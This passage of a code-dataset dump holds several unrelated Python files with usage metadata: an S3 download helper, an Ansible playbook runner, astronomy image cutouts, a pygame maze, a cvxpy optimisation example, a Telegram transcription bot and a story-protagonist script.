subprocess\nfrom pathlib import Path\nfrom os.path import expanduser\nfrom datetime import datetime\nfrom botocore.exceptions import ClientError\n\nclass S3helper:\n \"\"\"\n author:\n - Chris Falck: chris.falck@tickboxconsulting.com\n params:\n - prefix: pattern to match in s3\n - local: local path to folder in which to place files\n - bucket: s3 bucket with target contents\n - client: initialised s3 client object\n - preserve_dirs: bool to determine if s3 dir structure is preserved\n \"\"\"\n\n def __init__(self, prefix, local, bucket, client, preserve_dirs):\n self.prefix = prefix\n self.local = local\n self.bucket = bucket\n self.client = client\n self.preserve_dirs = preserve_dirs\n self.next_token = ''\n\n def tree(self):\n \"\"\"\n list objects\n \"\"\"\n base_kwargs = {\n 'Bucket':self.bucket,\n 'Prefix':self.prefix,\n }\n dirs = []\n keys = []\n tmp_file = 'tree_file'\n\n while self.next_token is not None:\n kwargs = base_kwargs.copy()\n if self.next_token != '':\n kwargs.update({'ContinuationToken': self.next_token})\n\n try:\n results = self.client.list_objects_v2(**kwargs)\n except ClientError as error:\n print(\"A Client exception occurred: %s\" % error)\n return error\n\n contents = results.get('Contents')\n\n home = expanduser('~')\n today = datetime.today().strftime('%Y-%m-%d')\n dl_path = os.path.join(home, \"delete-later-\"+today, self.bucket)\n\n pathlib.Path(dl_path).mkdir(parents=True, exist_ok=True)\n\n dl_path += os.sep\n\n for i in contents:\n k = i.get('Key')\n if k[-1] != '/':\n keys.append(k)\n else:\n dirs.append(k)\n self.next_token = results.get('NextContinuationToken')\n \n for d in dirs:\n dest_pathname = os.path.join(dl_path, d)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n for k in keys:\n dest_pathname = os.path.join(dl_path, k)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n Path(dl_path+k).touch()\n \n dl_path = dl_path[:-1]\n dl_path_arr = dl_path.split(os.sep)\n change2dir = os.sep.join(dl_path_arr[:-1])\n os.chdir(change2dir)\n \n os.system(\"tree \"+ self.bucket + \"> \" + self.local + \"/\" + tmp_file)\n with open(self.local + \"/\" + tmp_file, 'r') as file:\n data = file.read()\n file.close()\n\n shutil.rmtree(change2dir)\n os.remove(self.local + \"/\" + tmp_file)\n\n return(data)\n\n def download_dir(self):\n \"\"\"\n - Download objects from s3 matching the provided prefix\n - S3 Object paths can be preserved by setting 'preserve_dirs' to True\n - S3 Object paths can be removed by setting 'preserve_dirs' to False\n - If 'preserve_dirs' is False, all matched objects will be written directly\n to the 'local' directory\n \"\"\"\n\n keys = []\n dirs = []\n base_kwargs = {\n 'Bucket':self.bucket,\n 'Prefix':self.prefix,\n }\n\n while self.next_token is not None:\n kwargs = base_kwargs.copy()\n if self.next_token != '':\n kwargs.update({'ContinuationToken': self.next_token})\n\n try:\n results = self.client.list_objects_v2(**kwargs)\n except ClientError as error:\n print(\"A Client exception occurred: %s\" % error)\n return error\n\n contents = results.get('Contents')\n\n for i in contents:\n k = i.get('Key')\n if k[-1] != '/':\n keys.append(k)\n else:\n dirs.append(k)\n self.next_token = results.get('NextContinuationToken')\n if self.preserve_dirs:\n for d in dirs:\n dest_pathname = os.path.join(self.local, d)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n for k in keys:\n 
dest_pathname = os.path.join(self.local, k)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n self.client.download_file(self.bucket, k, dest_pathname)\n else:\n for k in keys:\n dest_pathname = os.path.join(self.local, os.path.basename(k))\n self.client.download_file(self.bucket, k, dest_pathname)\n\n def upload_object(self):\n \"\"\"\n s3_resource.meta.client.upload_file(\n Filename=first_file_name, Bucket=first_bucket_name,\n Key=first_file_name)\n \"\"\"\n pass\n\n def delete_object(self):\n \"\"\"\n s3_resource.Object(second_bucket_name, first_file_name).delete()\n \"\"\"\n pass\n\n def delete_all_objects(self):\n \"\"\"\n def delete_all_objects(bucket_name):\n res = []\n bucket=s3_resource.Bucket(bucket_name)\n for obj_version in bucket.object_versions.all():\n res.append({'Key': obj_version.object_key,\n 'VersionId': obj_version.id})\n print(res)\n bucket.delete_objects(Delete={'Objects': res})\n \"\"\"\n\n def delete_bucket(self):\n \"\"\"\n s3_resource.Bucket(first_bucket_name).delete() \n \"\"\"\n pass", "repo_name": "tickbox-smc/s3_helper", "sub_path": "s3helper.py", "file_name": "s3helper.py", "file_ext": "py", "file_size_in_byte": 5941, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "botocore.exceptions.ClientError", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 70, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 74, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.system", "line_number": 83, "usage_type": "call"}, {"api_name": "shutil.rmtree", 
"line_number": 88, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 89, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 116, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 132, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 136, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "33483797796", "text": "import argparse\nfrom utils.log_utils import schedule_logger\nfrom common.playbook import PlayBook\n\n\nclass PlayExecutor:\n @staticmethod\n def run_play():\n parser = argparse.ArgumentParser()\n parser.add_argument('--job_id', required=True, type=str, help='job id')\n parser.add_argument('--play_id', required=True, type=str, help='play id')\n parser.add_argument('--conf_path', required=True, type=str, help='play conf path')\n parser.add_argument('--hosts_path', required=True, type=str, help='play hosts file path')\n parser.add_argument('--test', required=False, action='store_true', help='test mode')\n parser.add_argument('--retry', required=False, action='store_true', help='retry mode')\n args = parser.parse_args()\n schedule_logger(args.job_id).info('enter play executor process')\n schedule_logger(args.job_id).info(args)\n\n play_args = ['ansible-playbook', '-i', args.hosts_path, args.conf_path]\n if args.test:\n play_args.append('-C')\n\n try:\n play = PlayBook(args=play_args)\n play.run_play(play_id=args.play_id, retry=args.retry)\n except Exception as e:\n schedule_logger().exception(e)\n raise\n\n\nif __name__ == '__main__':\n PlayExecutor.run_play()", "repo_name": "chengtcc/FATE-Cloud", "sub_path": "fate-manager/hyperion/driver/play_executor.py", "file_name": "play_executor.py", "file_ext": "py", "file_size_in_byte": 1305, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.log_utils.schedule_logger", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.log_utils.schedule_logger", "line_number": 18, "usage_type": "call"}, {"api_name": "common.playbook.PlayBook", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.log_utils.schedule_logger", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "26912152055", "text": 
"#Task 1\n\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy.nddata import Cutout2D\nfrom astropy.convolution import Box2DKernel\nimport sep\nimport numpy as np\n\n#importing data, reading in header information\nlarge_image_data = fits.getdata('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/large_mosaic.fits')\nlarge_image_header = fits.getheader('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/large_mosaic.fits')\n#extracting WCS information from the header\nlarge_image_WCS = WCS(large_image_header)\n\n'''\nStep 2 using configuration 2 I will run source extraction and create cutouts of 5 randomly selected objects in large_mosaic.fits\n'''\n#changing byte order\nbyte_swaped_data_large = large_image_data.byteswap().newbyteorder()\n\n#above this range sources will be identified\nback_size2 = 128\nback_filter_size2 = 5\nglobal_bkg2 = sep.Background(byte_swaped_data_large, bw=back_size2, bh=back_size2, \n fw=back_filter_size2, fh=back_filter_size2)\n#background subtraction\nbkg_subtracted2 = byte_swaped_data_large - global_bkg2\n\n#convolution filter\nfilter_size = 5 #number of pixels\nBsource_kernel = Box2DKernel(filter_size)\n\n#object catalog and segmentation map\nmin_area2 = 10\nnsigma2 = 3\ndeb_n_thresh2 = 64\ndeb_count2 = 0.001\nobjects2, segmap2 = sep.extract(bkg_subtracted2, nsigma2, err=global_bkg2.globalrms,\n minarea=min_area2, deblend_nthresh=deb_n_thresh2, \n deblend_cont=deb_count2, segmentation_map=True, \n filter_kernel = Bsource_kernel.array)\n\n#Select 5 sources\nrandom_sources = np.random.choice(objects2, 5)\n\n##Create cutouts for each source\n#the center for each random source\nx_cen1 = random_sources[0]['x']\ny_cen1 = random_sources[0]['y']\n\nx_cen2 = random_sources[1]['x']\ny_cen2 = random_sources[1]['y']\n\nx_cen3 = random_sources[2]['x']\ny_cen3 = random_sources[2]['y']\n\nx_cen4 = random_sources[3]['x']\ny_cen4 = random_sources[3]['y']\n\nx_cen5 = random_sources[4]['x']\ny_cen5 = random_sources[4]['y']\n\n#size of each cutout\nxsize = 100\nysize = 100\n\n#creating the cutouts for each random source\ncutout_image1 = Cutout2D(large_image_data, (x_cen1, y_cen1), (xsize, ysize), wcs = large_image_WCS)\ncutout_image2 = Cutout2D(large_image_data, (x_cen2, y_cen2), (xsize, ysize), wcs = large_image_WCS)\ncutout_image3 = Cutout2D(large_image_data, (x_cen3, y_cen3), (xsize, ysize), wcs = large_image_WCS)\ncutout_image4 = Cutout2D(large_image_data, (x_cen4, y_cen4), (xsize, ysize), wcs = large_image_WCS)\ncutout_image5 = Cutout2D(large_image_data, (x_cen5, y_cen5), (xsize, ysize), wcs = large_image_WCS)\n\n#accessing the image data from the cutout\ncutout_data1 = cutout_image1.data\ncutout_WCS1 = cutout_image1.wcs\n\ncutout_data2 = cutout_image2.data\ncutout_WCS2 = cutout_image2.wcs\n\ncutout_data3 = cutout_image3.data\ncutout_WCS3 = cutout_image3.wcs\n\ncutout_data4 = cutout_image4.data\ncutout_WCS4 = cutout_image4.wcs\n\ncutout_data5 = cutout_image5.data\ncutout_WCS5 = cutout_image5.wcs\n\n#create seperate fits files for each cutout\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_1.fits', \n cutout_data1, header=cutout_WCS1.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_2.fits', \n cutout_data2, header=cutout_WCS2.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_3.fits', \n cutout_data3, 
header=cutout_WCS3.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_4.fits', \n cutout_data4, header=cutout_WCS4.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_5.fits', \n cutout_data5, header=cutout_WCS5.to_header())", "repo_name": "higgins4286/Galaxy-Evolution-Data-and-Image-Analysis", "sub_path": "Advanced-Image-Analysis/Tutorial_VIII_Task1_Step2.py", "file_name": "Tutorial_VIII_Task1_Step2.py", "file_ext": "py", "file_size_in_byte": 3965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.io.fits.getdata", "line_number": 11, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 11, "usage_type": "name"}, {"api_name": "astropy.io.fits.getheader", "line_number": 12, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 12, "usage_type": "name"}, {"api_name": "astropy.wcs.WCS", "line_number": 14, "usage_type": "call"}, {"api_name": "sep.Background", "line_number": 25, "usage_type": "call"}, {"api_name": "astropy.convolution.Box2DKernel", "line_number": 32, "usage_type": "call"}, {"api_name": "sep.extract", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 69, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 70, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 71, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 72, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 73, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 92, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 92, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 95, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 95, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 98, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 98, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 101, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 101, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 104, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "41429595225", "text": "import pygame\nimport sys\nimport random\n\nCYAN = (0, 255, 255)\nGRAY = (96, 96, 96)\n\nMAZE_W = 11\nMAZE_H = 9\nmaze = []\nfor y in range(MAZE_H):\n maze.append([0] * MAZE_W)\n\ndef make_maze():\n XP = [0, 1, 0, -1]\n YP = [-1, 0, 1, 0]\n\n # 주변 벽\n for x in range(MAZE_W):\n maze[0][x] = 1\n maze[MAZE_H - 1][x] = 1\n for y in range(1, MAZE_H - 1):\n maze[y][0] = 1\n maze[y][MAZE_W - 1] = 1\n\n # 안을 아무것도 없는 상태로\n for y in range(1, MAZE_H - 1):\n for x in range(1, MAZE_W - 1):\n maze[y][x] = 0\n\n # 기둥\n for y in range(2, MAZE_H - 2, 2):\n for x in range(2, MAZE_W - 2, 2):\n maze[y][x] = 1\n\n # 기둥에서 상하좌우로 벽 생성\n for y in range(2, MAZE_H - 2, 2):\n for x in range(2, MAZE_W - 2, 2):\n d = random.randint(0, 3)\n if x > 2: # 2번째 열부터 왼쪽으로는 벽을 만들지 않음\n d = random.randint(0, 2)\n maze[y + YP[d]][x + XP[d]] = 1\n\n\ndef main():\n 
pygame.init()\n pygame.display.set_caption(\"미로 생성\")\n screen = pygame.display.set_mode((528, 432))\n clock = pygame.time.Clock()\n\n make_maze()\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n make_maze()\n\n for y in range(MAZE_H):\n for x in range(MAZE_W):\n W = 48\n H = 48\n X = x * W\n Y = y * H\n if maze[y][x] == 0: # 미로\n pygame.draw.rect(screen, CYAN, [X, Y, W, H])\n if maze[y][x] == 1: # 벽\n pygame.draw.rect(screen, GRAY, [X, Y, W, H])\n\n pygame.display.update()\n clock.tick(2)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Jpub/PythonGame_1", "sub_path": "Chapter11/maze_maker.py", "file_name": "maze_maker.py", "file_ext": "py", "file_size_in_byte": 1961, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 71, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "16690415735", "text": "#程序文件ex5_9.py\r\nimport numpy as np\r\nimport cvxpy as cp\r\n\r\nc1 = np.array([-2, -3])\r\nc2 = np.array([1, 2])\r\na = np.array([[0.5, 0.25], [0.2, 0.2], [1, 5], [-1, -1]])\r\nb = np.array([8, 4, 72, -10])\r\nx = cp.Variable(2, pos=True)\r\nobj = cp.Minimize(0.5 * (c1 + c2) @ x)\r\ncon = [a @ x <= b]\r\nprob = cp.Problem(obj, con)\r\nprob.solve(solver='GLPK_MI')\r\nprint('最优解为:', x.value)\r\nprint('最优值为:', prob.value)\r\n\r\nobj1 = cp.Minimize(c1 @ x)\r\nprob1 = cp.Problem(obj1, con)\r\nprob1.solve(solver='GLPK_MI')\r\nv1 = prob1.value #第一个目标函数的最优值\r\nobj2 = cp.Minimize(c2 @ x)\r\nprob2 = cp.Problem(obj2, con)\r\nprob2.solve(solver='GLPK_MI')\r\nv2 = prob2.value #第二个目标函数的最优值\r\nprint('两个目标函数的最优值分别为:', v1, v2)\r\nobj3 = cp.Minimize((c1@x-v1)**2+(c2@x-v2)**2)\r\nprob3 = cp.Problem(obj3, con)\r\nprob3.solve(solver='CVXOPT')\r\nprint('解法二的最优解:', x.value)\r\n\r\ncon.append( c1 @ x == v1)\r\nprob4 = 
cp.Problem(obj2, con)\r\nprob4.solve(solver='GLPK_MI')\r\nx3 = x.value #提出最优解的值\r\nprint('解法三的最优解:', x3)\r\nprint('利润:', -c1@x3); print('排放污染物:', c2@x3)\r\n\r\n", "repo_name": "LuyuZhang00/CUMCM2022", "sub_path": "python数学建模算法与应用/05第5章 非线性规划和多目标规划模型/ex5_9.py", "file_name": "ex5_9.py", "file_ext": "py", "file_size_in_byte": 1163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 9, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 10, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 12, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 17, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 18, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 21, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 22, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 26, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 27, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "2422779366", "text": "import requests\nfrom telebot import TeleBot, types\nimport envparse\nimport time\nimport os\nfrom faster_whisper import WhisperModel\n\n\nenvparse.env.read_envfile()\nTELEGRAM_BOT_TOKEN: str = envparse.env.str(\"TELEGRAM_BOT_TOKEN\")\nbot = TeleBot(TELEGRAM_BOT_TOKEN, threaded=False)\n\n\n@bot.message_handler(func=lambda message: True, content_types=['voice'])\ndef text_message(message):\n start_time = time.time()\n file_id = message.voice.file_id\n file_info = bot.get_file(file_id)\n if os.path.isfile('voice.wav'):\n # Delete the file if it exists\n os.remove('voice.wav')\n file = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(bot.token, file_info.file_path))\n open('voice.ogg', 'wb').write(file.content)\n\n model_size = \"medium\"\n model = WhisperModel(model_size, device=\"cpu\", compute_type=\"float32\")\n transcriptionstr = \"\"\n transcription, info = model.transcribe(\"voice.ogg\", beam_size=5)\n for segment in transcription:\n print(\"[%.2fs -> %.2fs] %s\" % (segment.start, segment.end, segment.text))\n transcriptionstr += segment.text + \" \"\n # print(\"Detected language '%s' with probability %f\" % (info.language, info.language_probability))\n time_exec = \"--- %s seconds ---\" % (time.time() - start_time)\n texttoreturn = '''\nLanguage: {}\nChance: {}\nText: {}\nTime: {}'''\n bot.send_message(chat_id=message.chat.id, text=texttoreturn.format(info.language, info.language_probability, transcriptionstr, time_exec))\n print(transcriptionstr)\n print(time_exec)\n\n\nbot.polling(none_stop=True)", "repo_name": "endlessnights/fasterwhisperpy", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "envparse.env.read_envfile", "line_number": 9, "usage_type": "call"}, {"api_name": "envparse.env", "line_number": 9, "usage_type": "attribute"}, {"api_name": "envparse.env.str", "line_number": 10, "usage_type": "call"}, {"api_name": "envparse.env", 
"line_number": 10, "usage_type": "attribute"}, {"api_name": "telebot.TeleBot", "line_number": 11, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "faster_whisper.WhisperModel", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "70054566887", "text": "\"\"\"\nRetrieves the protagonist (i.e. character with most mentions) name and gender\nfor each story, saving the results in a .tsv file.\n\n@author: Hardik\n\"\"\"\n\nimport argparse\nimport csv\nimport logging\nimport os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], os.path.join('..', 'src')))\n\nfrom collections import Counter\n\nfrom aliases import AliasesManager\nfrom corpus import CorpusManager\n\n\n# Configure logging\nlogging.basicConfig(format=\"%(levelname)s: [%(asctime)s] %(message)s\",\n\tlevel=logging.INFO)\n\n\n# Gendered pronouns.\nMALE_PRONOUNS = set(['he', 'him', 'himself', 'his'])\nFEMALE_PRONOUNS = set(['her', 'hers', 'herself', 'she'])\n\n\n# Returns the name of the protagonist character.\ndef get_protag(aliases):\n\tcntr = Counter()\n\n\tfor alias in aliases:\n\t\tcntr[alias['entity']['name']] += 1\n\n\tmc = cntr.most_common(1)\n\tif len(mc) == 0:\n\t\treturn None\n\n\treturn mc[0][0]\n\n\n# Determines the gender of the given character according to the given list of\n# aliases.\ndef det_gender(character_name, aliases):\n\tmale_pron_cnt, female_pron_cnt = 0, 0\n\n\tfor alias in aliases:\n\t\tif alias['entity']['name'] == character_name:\n\t\t\tspan = alias['span'].lower()\n\n\t\t\tif span in MALE_PRONOUNS:\n\t\t\t\tmale_pron_cnt += 1\n\t\t\telif span in FEMALE_PRONOUNS:\n\t\t\t\tfemale_pron_cnt += 1\n\n\tif male_pron_cnt > female_pron_cnt:\n\t\treturn 'MALE'\n\telif female_pron_cnt > male_pron_cnt:\n\t\treturn 'FEMALE'\n\telse:\n\t\treturn 'UNKNOWN'\n\n\t\ndef main():\n\tparser_description = (\"Retrieves the protagonist name and gender for each \"\n\t\t\"story, saving the results in a .tsv file.\")\n\tparser = argparse.ArgumentParser(description=parser_description)\n\n\tparser.add_argument('out_path', help=\"Output path to .tsv file\")\n\n\targs = parser.parse_args()\n\n\taliases_manager = AliasesManager()\n\tcorpus_manager = CorpusManager()\n\t\n\tlogging.info(\"Getting story Id's and pub. dates...\")\n\t# Get publication dates for all stories.\n\tdates = corpus_manager.get_dates()\n\t# Story Id's.\n\tsids = corpus_manager.get_ids(origin='gen')\n\n\twith open(args.out_path, 'wb') as f:\n\t\twriter = csv.writer(f, delimiter='\\t', quotechar='\"')\n\n\t\t# Write header.\n\t\twriter.writerow(['STORY ID', 'PUB. DATE', 'GENRE', 'PROTAG. NAME', 'PROTAG. 
GENDER'])\n\t\t\n\t\tfor sid in sids:\n\t\t\tif not aliases_manager.saved(sid, tpe='character'):\n\t\t\t\tlogging.info(\"Skipping %s...\" % sid)\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tlogging.info(\"Reading %s...\" % sid)\n\n\t\t\tgenre = (None if sid.startswith('000') else\n\t\t\t\t\tcorpus_manager.get_genre(sid, pretty=True))\n\t\t\trow = [sid, dates[sid] if sid in dates else 'DNE',\n\t\t\t\tgenre if genre else 'DNE']\n\n\t\t\taliases = aliases_manager.get_aliases(sid, tpe='character')\n\t\t\t\n\t\t\tprotag_name = get_protag(aliases)\n\n\t\t\tif protag_name is None:\n\t\t\t\trow += [None, None]\n\t\t\telse:\n\t\t\t\tprotag_gender = det_gender(protag_name, aliases)\n\t\t\t\trow += [protag_name.encode('utf-8'), protag_gender]\n\n\t\t\twriter.writerow(row)\n\t\t\n\nif __name__ == '__main__':\n\tmain()\n", "repo_name": "rbudac/McGill-Characterization-Process", "sub_path": "scripts/get_protag_info.py", "file_name": "get_protag_info.py", "file_ext": "py", "file_size_in_byte": 2858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 70, "usage_type": "call"}, {"api_name": "aliases.AliasesManager", "line_number": 76, "usage_type": "call"}, {"api_name": "corpus.CorpusManager", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 79, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 86, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "29079891239", "text": "import six\nfrom django import template\n\nfrom ttag import core, args\n\n\nclass 